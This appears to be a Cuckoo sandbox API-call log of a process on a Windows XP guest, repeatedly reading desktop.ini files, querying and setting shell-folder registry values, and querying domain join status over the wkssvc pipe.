| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 DataLength => 520 ValueName => ProgramFilesDir (x86) Type => 1304484 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => C\x00:\x00\\x00P\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => ProgramFilesDir |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Program Files |
SUCCESS | 0x001af608 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 DataLength => 520 ValueName => CommonPictures Type => 1303824 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrLoadDll |
Flags => 1303580 BaseAddress => 0x769c0000 FileName => USERENV.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetAllUsersProfileDirectoryW FunctionAddress => 0x769c66a1 ModuleHandle => 0x769c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c9c0000 FileName => SHELL32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00 ValueName => CommonPictures Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Pictures |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
LocalizedResourceName=@shell32.dll,-28997
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
LocalizedResourceName=@shell32.dll,-28997
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
LocalizedResourceName=@shell32.dll,-28997
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExA |
Handle => 0x0000021a Registry => 0x80000000 SubKey => CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\InProcServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00S\x00H\x00E\x00L\x00L\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrLoadDll |
Flags => 1301904 BaseAddress => 0x7c9c0000 FileName => C:\WINDOWS\system32\SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 DataLength => 4 ValueName => NoSharedDocuments Type => 1302624 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrLoadDll |
Flags => 1303060 BaseAddress => 0x5b860000 FileName => netapi32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetGetJoinInformation FunctionAddress => 0x5b869b54 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\wkssvc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtSetInformationFile |
FileHandle => 0x00000214 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,473 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x98\xd0\xffk\x12\xa1\x106\x983F\xc3\xf8~4Z\x01\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x9d&\x00\x00
\x00\PIPE\wkssvc\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x5b860000 FileName => netapi32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetApiBufferFree FunctionAddress => 0x5b867a00 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 DataLength => 520 ValueName => CommonMusic Type => 1303824 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c9c0000 FileName => SHELL32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00M\x00u\x00s\x00i\x00c\x00\x00\x00 ValueName => CommonMusic Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Music\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12689
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-237
LocalizedResourceName=@shell32.dll,-28995
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
